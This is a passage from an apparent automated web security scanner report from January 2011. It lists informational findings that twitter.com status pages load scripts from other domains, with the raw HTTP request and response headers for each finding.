Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3MjkyNzIyODcwNjgxNjoVaW5fbmV3X3VzZXJfZmxvdzA6DGNz%250AcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9u%250AYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--554a1d7e8d7d8704fcf0fcfd939e11401f12e57e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.464. http://twitter.com/malsup/status/28172927228706816 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/28172927228706816

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/28172927228706816 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224897-95647-22549
ETag: "9e559c9fc45aceb0c6ca126ade823c32"
Last-Modified: Fri, 28 Jan 2011 14:28:17 GMT
X-Runtime: 0.05413
Content-Type: text/html; charset=utf-8
Content-Length: 13565
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3MjkyNzIyODcwNjgxNjoMY3NyZl9pZCIlMThlMTViODg0ZThh%250AZWQxZDY1MTRiYmFiYmUzNzlmNTU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--c8db7209ce1246cbe1047e0cb576ed58c5085c73; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.465. http://twitter.com/malsup/status/28176483855896578 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/28176483855896578

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/28176483855896578 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:27:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224873-94611-54894
ETag: "9b55cdcf81cadef11b9b4336e0d1dfae"
Last-Modified: Fri, 28 Jan 2011 14:27:53 GMT
X-Runtime: 0.33314
Content-Type: text/html; charset=utf-8
Content-Length: 13615
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3NjQ4Mzg1NTg5NjU3ODoMY3NyZl9pZCIlYmEwMDczN2YyZjhl%250AZGZlZDk2OGM2ZmRjZDJmZTM1N2M6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--2a2ab9129448d1d35a9123d4379ea42935434e7c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.466. http://twitter.com/malsup/status/28176483855896578 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/28176483855896578

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/28176483855896578 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:08:14 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234494-57828-18740
ETag: "583131df175ad300da35c9e13d2481ed"
Last-Modified: Fri, 28 Jan 2011 17:08:14 GMT
X-Runtime: 0.06255
Content-Type: text/html; charset=utf-8
Content-Length: 13483
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3NjQ4Mzg1NTg5NjU3ODoVaW5fbmV3X3VzZXJfZmxvdzA6DGNz%250AcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9u%250AYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--457a29f43d6901343bf5adab0152517d04df4a48; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.467. http://twitter.com/malsup/status/28206363616215040 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/28206363616215040

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:27:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224864-76272-48360
ETag: "c834532c607a57bdbcfb09d898913ad5"
Last-Modified: Fri, 28 Jan 2011 14:27:44 GMT
X-Runtime: 0.06435
Content-Type: text/html; charset=utf-8
Content-Length: 13839
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODIwNjM2MzYxNjIxNTA0MDoMY3NyZl9pZCIlMzJhZDdhZWE4YTVi%250ANmI0N2NhYjc2Y2UzNjcwYmQ5NGQ6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--14d983691f33e1b982c79a5b234b9091c5640cfd; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.468. http://twitter.com/malsup/status/28206363616215040 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/28206363616215040

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:56 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225115-79599-58279
ETag: "496bb611dae1fab2d396828ac754bb25"
Last-Modified: Fri, 28 Jan 2011 14:31:55 GMT
X-Runtime: 0.07322
Content-Type: text/html; charset=utf-8
Content-Length: 13839
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODIwNjM2MzYxNjIxNTA0MDoMY3NyZl9pZCIlNTQ3YWI4MzY1NDlk%250AM2QxYjU5ZWI0ZjA4OGZhYmUzMzg6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--cea7407dd03e35bff455925686b2483d6d75c582; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.469. http://twitter.com/malsup/status/28450557672824832 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/28450557672824832

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225115-90988-57527
ETag: "b3bacdab099b8e0f8cb99bfb2c2eefcb"
Last-Modified: Fri, 28 Jan 2011 14:31:55 GMT
X-Runtime: 0.02967
Content-Type: text/html; charset=utf-8
Content-Length: 13675
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODQ1MDU1NzY3MjgyNDgzMjoMY3NyZl9pZCIlZGJjMGMxMWFiN2Qz%250AMGU3MTRmZWFkMTQwOWU2MWVjMjU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--6f098dd1b2ef6ae372fe1657bc91feba15cfb6e6; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.470. http://twitter.com/malsup/status/28450557672824832 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/28450557672824832

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:27:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224842-72786-11424
ETag: "8a913eb0d26cf4b51ef377e6d58d6b3a"
Last-Modified: Fri, 28 Jan 2011 14:27:22 GMT
X-Runtime: 0.06597
Content-Type: text/html; charset=utf-8
Content-Length: 13675
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODQ1MDU1NzY3MjgyNDgzMjoMY3NyZl9pZCIlNWU2ZTIzZGIyYjk5%250AODhkOTAwNjg4NThhZjkxOGU2MmU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--e2496f1dbb064b5c8414d329ac11463253046feb; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.471. http://twitter.com/malsup/status/28451243869339648 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/28451243869339648

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:54 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225114-40418-38564
ETag: "becf8c1fddbedb2b66432859efada267"
Last-Modified: Fri, 28 Jan 2011 14:31:54 GMT
X-Runtime: 0.04264
Content-Type: text/html; charset=utf-8
Content-Length: 13734
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
